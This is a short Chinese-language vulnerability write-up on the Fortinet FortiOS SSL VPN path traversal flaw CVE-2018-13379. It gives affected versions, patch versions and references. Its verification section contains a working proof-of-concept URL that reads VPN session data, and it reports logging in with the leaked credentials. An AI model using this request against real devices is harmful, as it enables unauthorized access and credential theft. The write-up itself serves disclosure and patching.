Fortinet FortiOS路径遍历漏洞 CVE-2018-13379

Fortinet FortiOS路径遍历漏洞 CVE-2018-13379

一、漏洞介绍

Fortinet FortiOS是美国飞塔（Fortinet）公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、VPN、Web内容过滤和反垃圾邮件等多种安全功能。在2019年blackhat上，安全研究人员公布了Fortinet FortiOS多个漏洞，包括Fortinet FortiOS路径遍历漏洞（CNNVD-201905-1026、CVE-2018-13379）、Fortinet FortiOS 跨站脚本漏洞（CNNVD-201905-1024、CVE-2018-13380）、Fortinet FortiOS 缓冲区错误漏洞（CNNVD-201905-878、CVE-2018-13381）（CNNVD-201904-116、CVE-2018-13383）、Fortinet FortiOS授权问题漏洞（CNNVD-201905-1025、CVE-2018-13382）等。成功利用漏洞的攻击者，可在未经身份验证的情况下获取用户账号敏感信息，修改账号密码，从而最终控制目标系统。

二、漏洞危害

Fortinet FortiOS路径遍历漏洞（CNNVD-201905-1026、CVE-2018-13379）
漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素，导致攻击者可以利用该漏洞访问受限目录以外的位置。Fortinet FortiOS 5.6.3版本至5.6.7版本、6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影响。

三、漏洞验证

POC：https://192.168.1.1:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/ssl_websession

利用泄露的账户herschel/v123成功登陆。

四、漏洞修复

目前，Fortigate官方已发布升级补丁修复了该漏洞，建议用户尽快将Fontigate升级到FortiOS 5.4.11、5.6.9、6.0.5、6.2.0或更高版本，从而修补漏洞带来的危害。官方补丁链接如下：
https://fortiguard.com/psirt/FG-IR-18-384

参考链接：
https://www.cnblogs.com/dgjnszf/p/11355242.html
http://www.fangyuba.com/news/broadcast/492.htm
https://www.venustech.com.cn/article/1/9891.html
检测工具：
https://github.com/milo2012/CVE-2018-13379